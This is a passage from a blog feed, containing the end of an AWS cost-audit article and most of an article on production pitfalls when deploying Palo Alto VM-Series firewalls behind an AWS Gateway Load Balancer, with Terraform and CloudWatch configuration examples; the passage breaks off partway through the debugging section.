  &lt;span class="nt"&gt;--end-time&lt;/span&gt; &lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; &lt;span class="nt"&gt;-u&lt;/span&gt; +%Y-%m-%dT%H:%M:%S&lt;span class="si"&gt;)&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--period&lt;/span&gt; 3600 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--statistics&lt;/span&gt; Maximum &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--output&lt;/span&gt; table
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Prevent with Terraform:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;resource&lt;/span&gt; &lt;span class="s2"&gt;"aws_db_instance"&lt;/span&gt; &lt;span class="s2"&gt;"main"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;instance_class&lt;/span&gt;    &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;environment&lt;/span&gt; &lt;span class="p"&gt;==&lt;/span&gt; &lt;span class="s2"&gt;"prod"&lt;/span&gt; &lt;span class="err"&gt;?&lt;/span&gt; &lt;span class="s2"&gt;"db.r6g.large"&lt;/span&gt; &lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"db.t4g.micro"&lt;/span&gt;
  &lt;span class="nx"&gt;multi_az&lt;/span&gt;          &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;environment&lt;/span&gt; &lt;span class="p"&gt;==&lt;/span&gt; &lt;span class="s2"&gt;"prod"&lt;/span&gt;
  &lt;span class="nx"&gt;allocated_storage&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;environment&lt;/span&gt; &lt;span class="p"&gt;==&lt;/span&gt; &lt;span class="s2"&gt;"prod"&lt;/span&gt; &lt;span class="err"&gt;?&lt;/span&gt; &lt;span class="mi"&gt;100&lt;/span&gt; &lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;20&lt;/span&gt;
  &lt;span class="nx"&gt;storage_type&lt;/span&gt;      &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"gp3"&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Environment-aware sizing. Dev gets the minimum, production gets what it needs. No more copying production configs into staging and forgetting about it.&lt;/p&gt;

&lt;h2&gt;
  
  
  The pattern behind all five
&lt;/h2&gt;

&lt;p&gt;You've probably noticed the key problem. Most of these issues don't affect startups or small businesses that look at every cent twice. They affect large companies. You know what's worse? In difficult times these large companies often look for savings in staffing rather than in the things I've described here. Nobody seems to be paying attention to those. You know why? Because the staff has shrunk...&lt;/p&gt;

&lt;p&gt;And it's not like I see this everywhere. Usually, the teams I work with know AWS really well. There's simply a real shortage of people and time to devote to cloud cost optimization.&lt;/p&gt;

&lt;h2&gt;
  
  
  What to do about it
&lt;/h2&gt;

&lt;p&gt;Simply take these ready-made commands and run them against your environment. It'll take you maybe 10 minutes, and the savings might be enough to keep someone's full-time job, maybe your own.&lt;/p&gt;

&lt;p&gt;If you want to go deeper into the topic - identify over-provisioned compute, audit data transfer patterns, check commitment coverage (Savings Plans and Reserved Instances) - that's a longer conversation. But start with these five. They can be checked for free, and most can be fixed for free.&lt;/p&gt;

&lt;p&gt;I built &lt;a href="https://github.com/gebalamariusz/cloud-audit" rel="noopener noreferrer"&gt;cloud-audit&lt;/a&gt; to automate the security side of these checks - it runs 30+ checks in ~12 seconds. For cost specifically, the five CLI commands above are your starting point.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://haitmg.pl/blog/aws-cost-waste-audit-findings/" rel="noopener noreferrer"&gt;haitmg.pl&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

</description>
      <category>aws</category>
      <category>devops</category>
      <category>cloud</category>
      <category>terraform</category>
    </item>
    <item>
      <title>GWLB in Production: 9 Pitfalls That Break Your Firewall Architecture</title>
      <dc:creator>Mariusz Gębala</dc:creator>
      <pubDate>Tue, 10 Mar 2026 13:30:22 +0000</pubDate>
      <link>https://dev.to/haitmg/gwlb-in-production-9-pitfalls-that-break-your-firewall-architecture-2l4p</link>
      <guid>https://dev.to/haitmg/gwlb-in-production-9-pitfalls-that-break-your-firewall-architecture-2l4p</guid>
      <description>&lt;p&gt;As a Cloud Engineer, I have frequently implemented solutions that improve both network and application security in clients' infrastructures. One of the options chosen most often was Palo Alto VM-Series firewalls, which are designed specifically for public clouds. Implementing VM-Series, however, isn't as straightforward as it sounds in theory. To get a truly functional infrastructure, many other resources must be deployed around the firewalls themselves. Take AWS, for example. One of the most popular approaches is to use a Gateway Load Balancer (in fact, this use case is one of the reasons AWS introduced this type of load balancer). Choosing GWLB, however, brings other dependencies, such as Gateway Load Balancer Endpoints, which should sit in dedicated subnets, so the routing tables for each of these subnets also have to be set up correctly. Ultimately, it turns out that it's best to encapsulate the security portion of the infrastructure in a dedicated VPC. But since that is a separate VPC, it needs to be connected to the other VPCs somehow so that their traffic is actually filtered and inspected by the firewalls. This is where Transit Gateway comes in.&lt;/p&gt;

&lt;p&gt;As you can see, just listing the dependencies is no easy task, let alone configuring them. In this article, I'd like to focus on a few key aspects that can save you time if you choose this architecture. I've implemented it numerous times for clients across various industries. As I walk through the configuration, I'll describe some less typical issues that might otherwise give you a few extra gray hairs.&lt;/p&gt;

&lt;h2&gt;
  
  
  The architecture
&lt;/h2&gt;

&lt;p&gt;Before diving into the pitfalls, here's the centralized inspection architecture this article is about:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fhaitmg.pl%2Fimages%2Fgwlb-architecture.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fhaitmg.pl%2Fimages%2Fgwlb-architecture.jpg" alt="Centralized GWLB + VM-Series architecture: App VPC → Transit Gateway → Security VPC with GWLB Endpoints, Gateway Load Balancer, VM-Series firewalls, and NAT Gateways across 2 AZs" width="800" height="233"&gt;&lt;/a&gt;&lt;/p&gt;



&lt;p&gt;&lt;em&gt;Click the diagram to open full-size in a new tab - route table details are readable at full resolution.&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Asymmetric traffic forwarding without TGW Appliance Mode
&lt;/h2&gt;

&lt;p&gt;We're considering a scenario where we implement our solution in a centralized architecture. The Transit Gateway is responsible for sending traffic between VPCs. Now let's imagine this situation (let's trace the packet flow together).&lt;/p&gt;

&lt;p&gt;A virtual machine (let's call it app_vm) in Spoke VPC attempts to send a packet to a second virtual machine in another Spoke VPC (let's call it db_vm). app_vm is located in &lt;strong&gt;AZ A&lt;/strong&gt;, db_vm is located in &lt;strong&gt;AZ B&lt;/strong&gt;. Here's what happens:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;app_vm initiates a connection. It checks the routing table in its subnet, which states that every packet destined for the 172.16.0.0/16 subnet is sent to the Transit Gateway.&lt;/li&gt;
&lt;li&gt;Transit Gateway receives the packet from the VPC where app_vm is located. It checks the routing table associated with that VPC. The routing table clearly states: send this packet to Security VPC.&lt;/li&gt;
&lt;li&gt;Transit Gateway forwards the packet to Security VPC. And here's a very important point that will have consequences later. Due to &lt;strong&gt;AZ affinity&lt;/strong&gt; (TGW's default behavior - it sends traffic to the same AZ the packet originated from), the packet is sent to the Transit Gateway Attachment subnet in &lt;strong&gt;AZ A&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;The Transit Gateway Attachment subnet in AZ A receives the packet and forwards it to the Gateway Load Balancer Endpoint, also in AZ A.&lt;/li&gt;
&lt;li&gt;The packet reaches the Gateway Load Balancer and is then forwarded to the VM-Series in AZ A.&lt;/li&gt;
&lt;li&gt;Policies configured on the firewall allow the packet to pass through, so the packet is sent to the Gateway Load Balancer Endpoint subnet (AZ A) and then to the Transit Gateway.&lt;/li&gt;
&lt;li&gt;The Transit Gateway receives the packet from the Security VPC and forwards it based on the routing table to the Spoke VPC where db_vm is located. The packet reaches the destination machine.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Sounds good, right? Now let's trace the return traffic.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;db_vm responds to the request received from app_vm. It checks the routing table in its subnet, which says that a packet destined for 192.168.0.0/24 should be sent to the Transit Gateway. It does so.&lt;/li&gt;
&lt;li&gt;The Transit Gateway receives this packet, checks the routing table, and forwards it to the Security VPC.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;This is the key moment.&lt;/strong&gt; Due to the same AZ affinity mechanism, the Transit Gateway sends this packet to the Transit Gateway Attachment subnet in &lt;strong&gt;AZ B&lt;/strong&gt; - because db_vm is in AZ B. This is not random - TGW deterministically picks the AZ based on where the packet entered.&lt;/li&gt;
&lt;li&gt;The packet is forwarded to the Gateway Load Balancer Endpoint in the subnet in AZ B. The packet is then forwarded to the Gateway Load Balancer, which forwards it to the VM-Series in AZ B.&lt;/li&gt;
&lt;li&gt;The VM-Series in AZ B receives the packet and thinks, "What is this? I have no idea what this session is about."&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;DROP.&lt;/strong&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Fortunately, solving this problem is incredibly simple (but only if you understand the problem). On the Transit Gateway VPC attachment for the Security VPC, enable the &lt;strong&gt;Appliance Mode&lt;/strong&gt; option. This changes TGW's forwarding logic from AZ affinity to a &lt;strong&gt;flow hash based on the 4-tuple&lt;/strong&gt; (source IP, destination IP, source port, destination port), which ensures both directions of a flow are always delivered to the same AZ in the Security VPC. &lt;strong&gt;This option is not enabled by default.&lt;/strong&gt;&lt;/p&gt;
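
&lt;p&gt;If the attachment is managed with Terraform, the setting is a single argument. A minimal sketch, assuming hypothetical resource names for the transit gateway, the Security VPC and its TGW attachment subnets:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;# Assumptions: aws_ec2_transit_gateway.main, aws_vpc.security and
# aws_subnet.tgw_attachment are hypothetical names
resource "aws_ec2_transit_gateway_vpc_attachment" "security" {
  transit_gateway_id = aws_ec2_transit_gateway.main.id
  vpc_id             = aws_vpc.security.id
  subnet_ids         = aws_subnet.tgw_attachment[*].id

  # Defaults to "disable"; set it explicitly on the Security VPC attachment
  appliance_mode_support = "enable"
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Only the attachment of the VPC that hosts the firewalls needs this; the spoke VPC attachments can stay on the default.&lt;/p&gt;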

&lt;p&gt;&lt;strong&gt;Sources:&lt;/strong&gt; &lt;a href="https://docs.aws.amazon.com/vpc/latest/tgw/transit-gateway-appliance-scenario.html" rel="noopener noreferrer"&gt;AWS Docs: Transit Gateway Appliance Mode&lt;/a&gt;, &lt;a href="https://docs.aws.amazon.com/prescriptive-guidance/latest/inline-traffic-inspection-third-party-appliances/transit-gateway-asymmetric-routing.html" rel="noopener noreferrer"&gt;AWS Prescriptive Guidance: Transit Gateway asymmetric routing&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  2. Fail-open when all targets are unhealthy
&lt;/h2&gt;

&lt;p&gt;Imagine an extremely rare, but still possible, situation. All your firewalls in all AZs in your Security VPC become inoperable for some reason. The Target Group associated with GWLB sees them all as unhealthy. What comes to mind first? That GWLB will drop the traffic rather than forward it to unhealthy instances. That seems logical, but unfortunately it's not true.&lt;/p&gt;

&lt;p&gt;GWLB will go into fail-open mode: it keeps forwarding traffic to the registered targets even though all of them are marked unhealthy. What does this mean for you? It depends. If the firewall has crashed or been terminated, the traffic will indeed stop at the firewall and be dropped. However, if the firewall is up but failing health checks (e.g., due to a CPU spike, a license expiry, or a bad Panorama push), it can let this traffic through without inspection. This is a real security bypass.&lt;/p&gt;

&lt;p&gt;How can you protect against this? There are several options.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Configuring alerts on CloudWatch for &lt;code&gt;UnHealthyHostCount&lt;/code&gt; is a must - so you're at least aware that there might be a threat.&lt;/li&gt;
&lt;li&gt;Configuring &lt;code&gt;target_failover.on_unhealthy&lt;/code&gt; to &lt;code&gt;rebalance&lt;/code&gt; will rehash flows to healthy targets. Note that this helps when &lt;em&gt;some&lt;/em&gt; targets are unhealthy - if all targets are down, there's nowhere to rebalance to.&lt;/li&gt;
&lt;li&gt;A great, though slightly more advanced, solution is to use a Lambda-based kill switch. If such a situation occurs, the function should modify the routing tables to blackhole traffic.&lt;/li&gt;
&lt;/ul&gt;
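
&lt;p&gt;The first two options can be sketched in Terraform roughly as follows. The names &lt;code&gt;aws_lb.gwlb&lt;/code&gt;, &lt;code&gt;aws_vpc.security&lt;/code&gt; and &lt;code&gt;aws_sns_topic.alerts&lt;/code&gt; are placeholders, the thresholds are illustrative, and the health check settings are left at their defaults for brevity:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;# Assumptions: aws_lb.gwlb, aws_vpc.security and aws_sns_topic.alerts are hypothetical
resource "aws_lb_target_group" "firewalls" {
  name     = "vmseries-fw"
  port     = 6081
  protocol = "GENEVE"
  vpc_id   = aws_vpc.security.id

  # Rehash existing flows to healthy targets; both values must match
  target_failover {
    on_deregistration = "rebalance"
    on_unhealthy      = "rebalance"
  }
}

# Alert as soon as any firewall is reported unhealthy
resource "aws_cloudwatch_metric_alarm" "gwlb_unhealthy" {
  alarm_name          = "gwlb-unhealthy-firewalls"
  namespace           = "AWS/GatewayELB"
  metric_name         = "UnHealthyHostCount"
  statistic           = "Maximum"
  period              = 60
  evaluation_periods  = 2
  comparison_operator = "GreaterThanThreshold"
  threshold           = 0
  alarm_actions       = [aws_sns_topic.alerts.arn]

  dimensions = {
    LoadBalancer = aws_lb.gwlb.arn_suffix
    TargetGroup  = aws_lb_target_group.firewalls.arn_suffix
  }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;It's worth confirming in the CloudWatch console that the alarm's dimensions match the metric as it is actually published for your load balancer. The same alarm could also serve as the trigger for a kill-switch function.&lt;/p&gt;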

&lt;p&gt;&lt;strong&gt;Sources:&lt;/strong&gt; &lt;a href="https://docs.aws.amazon.com/elasticloadbalancing/latest/gateway/health-checks.html" rel="noopener noreferrer"&gt;AWS Docs: Health checks for GWLB target groups&lt;/a&gt;, &lt;a href="https://docs.aws.amazon.com/whitepapers/latest/building-scalable-secure-multi-vpc-network-infrastructure/using-gwlb-with-tg-for-cns.html" rel="noopener noreferrer"&gt;AWS Whitepaper: GWLB with TGW for centralized security&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  3. The real cost stack
&lt;/h2&gt;

&lt;p&gt;GWLB is usually quoted at around $0.014 per hour per AZ. That's true, but it's only the GWLB itself. The table below lists all the ACTUAL costs:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Component&lt;/th&gt;
&lt;th&gt;Cost basis&lt;/th&gt;
&lt;th&gt;Monthly cost (3 AZs, 2 FW/AZ, 1 TB/mo)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;GWLB hourly&lt;/td&gt;
&lt;td&gt;$0.014/AZ-hour&lt;/td&gt;
&lt;td&gt;$31&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GWLB usage (GLCU)&lt;/td&gt;
&lt;td&gt;$0.004/GLCU-hour&lt;/td&gt;
&lt;td&gt;~$50&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GWLBE hourly (PrivateLink)&lt;/td&gt;
&lt;td&gt;$0.011/hour per endpoint&lt;/td&gt;
&lt;td&gt;$24&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GWLBE data processing&lt;/td&gt;
&lt;td&gt;$0.01/GB&lt;/td&gt;
&lt;td&gt;$10&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cross-AZ data transfer&lt;/td&gt;
&lt;td&gt;$0.01/GB each direction&lt;/td&gt;
&lt;td&gt;$20&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;TGW attachment&lt;/td&gt;
&lt;td&gt;$0.07/hour per attachment&lt;/td&gt;
&lt;td&gt;$153&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;TGW data processing&lt;/td&gt;
&lt;td&gt;$0.02/GB&lt;/td&gt;
&lt;td&gt;$20&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;EC2 instances (6x c5n.xlarge)&lt;/td&gt;
&lt;td&gt;~$0.34/h per instance&lt;/td&gt;
&lt;td&gt;$1,489&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Subtotal (infra only)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;~$1,797/mo&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;VM-Series PAYG license&lt;/td&gt;
&lt;td&gt;$1.71/h per instance&lt;/td&gt;
&lt;td&gt;$7,490&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Total with PAYG&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;~$9,287/mo&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;VM-Series BYOL license (amortized)&lt;/td&gt;
&lt;td&gt;varies&lt;/td&gt;
&lt;td&gt;~$2,400-3,600&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Total with BYOL&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;~$4,197-5,397/mo&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;As you can see, your monthly invoice covers far more than the GWLB itself. You budgeted around $500, and at the end of the month you receive an invoice for ~$9,000 (depending on the region). Consider an alternative - perhaps the native AWS Network Firewall will be enough for your needs, at &lt;a href="https://haitmg.pl/blog/aws-network-firewall-vs-palo-alto-vm-series/" rel="noopener noreferrer"&gt;around $750 per month&lt;/a&gt;. (Of course, this also cuts out many features - I described this in more detail in &lt;a href="https://haitmg.pl/blog/aws-network-firewall-vs-palo-alto-vm-series/" rel="noopener noreferrer"&gt;this article&lt;/a&gt;.)&lt;/p&gt;

&lt;p&gt;And another "pleasant" surprise: if you enable cross-zone load balancing on GWLB, remember that you pay $0.01/GB for each cross-AZ hop. Factor this in when planning your HA architecture.&lt;/p&gt;
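
&lt;p&gt;To adapt the table to your own region or topology, the arithmetic behind it can be written down as Terraform locals. This is only a sketch: it assumes 730 hours per month, 1 TB counted as 1,000 GB, and three GWLB endpoints and three TGW attachments, which is what the table's monthly figures imply. The GLCU line is taken from the table as an estimate, since it depends on actual usage:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;# Assumptions: 730 h/month, 1 TB = 1,000 GB, 3 GWLB endpoints, 3 TGW attachments
locals {
  hours = 730
  azs   = 3
  fws   = 6
  gb    = 1000

  gwlb_hourly  = 0.014 * local.azs * local.hours # about 31
  gwlb_glcu    = 50                              # usage-dependent estimate from the table
  gwlbe_hourly = 0.011 * 3 * local.hours         # about 24
  gwlbe_data   = 0.01 * local.gb                 # 10
  cross_az     = 0.01 * 2 * local.gb             # 20, both directions
  tgw_attach   = 0.07 * 3 * local.hours          # about 153
  tgw_data     = 0.02 * local.gb                 # 20
  ec2          = 0.34 * local.fws * local.hours  # about 1,489
  payg_license = 1.71 * local.fws * local.hours  # about 7,490

  infra_subtotal  = local.gwlb_hourly + local.gwlb_glcu + local.gwlbe_hourly + local.gwlbe_data + local.cross_az + local.tgw_attach + local.tgw_data + local.ec2
  total_with_payg = local.infra_subtotal + local.payg_license
}

output "monthly_cost_usd" {
  value = {
    infra_subtotal  = floor(local.infra_subtotal)  # 1797, as in the table
    total_with_payg = floor(local.total_with_payg) # 9287, as in the table
  }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Changing &lt;code&gt;fws&lt;/code&gt; or the hourly rates shows quickly that the firewall instances and their licenses, not the GWLB, dominate the bill.&lt;/p&gt;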

&lt;p&gt;&lt;strong&gt;Sources:&lt;/strong&gt; &lt;a href="https://aws.amazon.com/elasticloadbalancing/pricing/" rel="noopener noreferrer"&gt;AWS ELB Pricing&lt;/a&gt;, &lt;a href="https://aws.amazon.com/privatelink/pricing/" rel="noopener noreferrer"&gt;AWS PrivateLink Pricing&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  4. Palo Alto overlay routing - not a silver bullet
&lt;/h2&gt;

&lt;p&gt;Overlay Routing in VM-Series can be a great solution. We don't need to create separate NAT Gateways native to AWS; traffic to the internet exits directly through the firewall's public interface. And that's all great, but this configuration will only work for outbound traffic.&lt;/p&gt;

&lt;p&gt;What about inbound traffic? The firewall will inspect the packet, apply overlay routing, and instead of returning the packet back through the GWLB endpoint, it will send it out through its public interface. The result - asymmetric routing and dropped connections.&lt;/p&gt;

&lt;p&gt;East-west traffic (VPC-to-VPC) in a centralized TGW architecture is a different story - it actually &lt;strong&gt;works fine&lt;/strong&gt; with overlay routing. The packets have private destination IPs, so the firewall's L3 lookup routes them back via the GENEVE interface, not out the public interface.&lt;/p&gt;

&lt;p&gt;But there are solutions for combined traffic too.&lt;/p&gt;

&lt;p&gt;First and foremost, consider whether you really need overlay routing. If the firewalls will only inspect outbound traffic, then yes, it would be a shame not to take advantage of it.&lt;/p&gt;

&lt;p&gt;If you need inbound traffic handling but don't want to give up overlay routing, don't worry. You'll need to spend a bit more time on configuring subinterfaces and virtual routers, but it can be done while maintaining full functionality.&lt;/p&gt;

&lt;p&gt;One more thing worth mentioning - there was a confirmed bug (PAN-229985, fixed in PAN-OS 11.1.3) where GWLB overlay routing packets were re-encapsulated with an incorrect flow cookie in the GENEVE header. Some of the &lt;a href="https://live.paloaltonetworks.com/t5/vm-series-in-the-public-cloud/issues-with-overlay-routing-and-aws-gateway-load-balancer/td-p/500206" rel="noopener noreferrer"&gt;issues reported on LIVEcommunity&lt;/a&gt; may have been caused by this bug rather than an architectural limitation. Make sure you're running a version with this fix.&lt;/p&gt;

&lt;p&gt;Finally, before you decide to deploy this solution to production, test it in a test environment.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Sources:&lt;/strong&gt; &lt;a href="https://docs.paloaltonetworks.com/vm-series/11-0/vm-series-deployment/set-up-the-vm-series-firewall-on-aws/vm-series-integration-with-gateway-load-balancer/integrate-the-vm-series-with-an-aws-gateway-load-balancer/enable-overlay-routing-for-the-vm-series-on-aws" rel="noopener noreferrer"&gt;Palo Alto: Enable Overlay Routing for VM-Series on AWS&lt;/a&gt;, &lt;a href="https://live.paloaltonetworks.com/t5/vm-series-in-the-public-cloud/clarity-on-overlay-routing-with-gwlb-for-combined-centralized/td-p/575909" rel="noopener noreferrer"&gt;LIVEcommunity: Overlay Routing with GWLB for Combined Model (SOLVED)&lt;/a&gt;, &lt;a href="https://live.paloaltonetworks.com/t5/vm-series-in-the-public-cloud/issues-with-overlay-routing-and-aws-gateway-load-balancer/td-p/500206" rel="noopener noreferrer"&gt;LIVEcommunity: Issues with Overlay Routing and GWLB&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  5. PAN-OS version roulette
&lt;/h2&gt;

&lt;p&gt;Remember - there's no operating system in the world that's bug-free. PAN-OS is no exception. Some versions of PAN-OS have problems coexisting with GWLB, particularly when overlay routing is enabled:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;PAN-OS Version&lt;/th&gt;
&lt;th&gt;GWLB Status&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;10.1.5-h5&lt;/td&gt;
&lt;td&gt;Working&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;10.1.6&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;strong&gt;Broken&lt;/strong&gt; (fix in 10.1.6-h6)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;10.1.7&lt;/td&gt;
&lt;td&gt;Working&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;10.2.2&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Broken&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;10.2.3-h2&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Issues reported&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;11.0.0 (EOL)&lt;/td&gt;
&lt;td&gt;Issues reported&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;We usually assume that a newer version will be better than the previous one, so we upgrade (because who would test anyway...). We move to the latest release and... something's not right. The Gateway Load Balancer Endpoints stop working, yet they don't show any errors either.&lt;/p&gt;

&lt;p&gt;The solution is brutally simple, but many users seem to forget this. TEST the new PAN-OS version in a non-production environment. Don't go straight to production with untested software. When you buy new running shoes, do you immediately wear them in the most important race of your life, or do you test them during training sessions to make sure they really suit you?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Sources:&lt;/strong&gt; &lt;a href="https://live.paloaltonetworks.com/t5/vm-series-in-the-public-cloud/issues-with-overlay-routing-and-aws-gateway-load-balancer/td-p/500206" rel="noopener noreferrer"&gt;LIVEcommunity: Overlay Routing + GWLB issues&lt;/a&gt;, &lt;a href="https://live.paloaltonetworks.com/t5/general-topics/aws-gwlb-vpc-endpoint-associations-no-longer-work-post-upgrade/td-p/627319" rel="noopener noreferrer"&gt;LIVEcommunity: GWLB VPC Endpoint broken post-upgrade&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  6. NAT on the firewall breaks traffic
&lt;/h2&gt;

&lt;p&gt;Are you an administrator managing firewalls at your on-prem location and have been tasked with deploying VM-Series in the cloud? I'd bet your intuition (and probably rightly so) tells you that one of the most important configurations will be the correct NAT settings on the firewalls. You apply the same pattern to the Cloud Firewall with GWLB and... it doesn't work? No wonder.&lt;/p&gt;

&lt;p&gt;GWLB validates the 5-tuple of return packets against its connection state table. If you've set up DNAT on the firewall, the 5-tuple of the returning packet no longer matches, so GWLB drops it. And don't expect it to be easy to spot - you won't get a clear error (and forget about the logs).&lt;/p&gt;

&lt;p&gt;When using GWLB, you don't need to NAT on the VM-Series. If you carefully examine the architecture (the one at the beginning of the article), you'll notice that a NAT Gateway is enough to handle outbound traffic. The exception is overlay routing (see section 4), where the firewall handles outbound NAT directly.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Sources:&lt;/strong&gt; &lt;a href="https://repost.aws/questions/QUs-FovHmIRLKcSJWrGhESiQ/nat-on-palo-fw-appliance-with-gateway-load-balancer-instead-of-using-nat-gateway" rel="noopener noreferrer"&gt;AWS re:Post: NAT on Palo FW with GWLB&lt;/a&gt;, &lt;a href="https://aws.amazon.com/blogs/networking-and-content-delivery/best-practices-for-deploying-gateway-load-balancer/" rel="noopener noreferrer"&gt;AWS Best practices for GWLB&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  7. The debugging nightmare
&lt;/h2&gt;

&lt;p&gt;Gateway Load Balancer is a brilliant AWS solution... but not for debugging traffic problems.&lt;/p&gt;

&lt;p&gt;Even default VPC Flow Logs won't help much here. The problem is that GWLB encapsulates traffic with the GENEVE protocol on UDP port 6081. Instead of the actual source and destination addresses, you'll see private addresses that tell you nothing about the original flow.&lt;/p&gt;

&lt;p&gt;Make one mistake in any routing table and you're in... a black hole. Look at the architecture diagram to see how many routing tables appear in the VPC itself (and add the corresponding routing tables in TGW, in the Spoke VPCs). You have to be careful, and honestly, I don't have a silver bullet.&lt;/p&gt;

&lt;p&gt;What can help?&lt;/p&gt;

&lt;ul&gt;
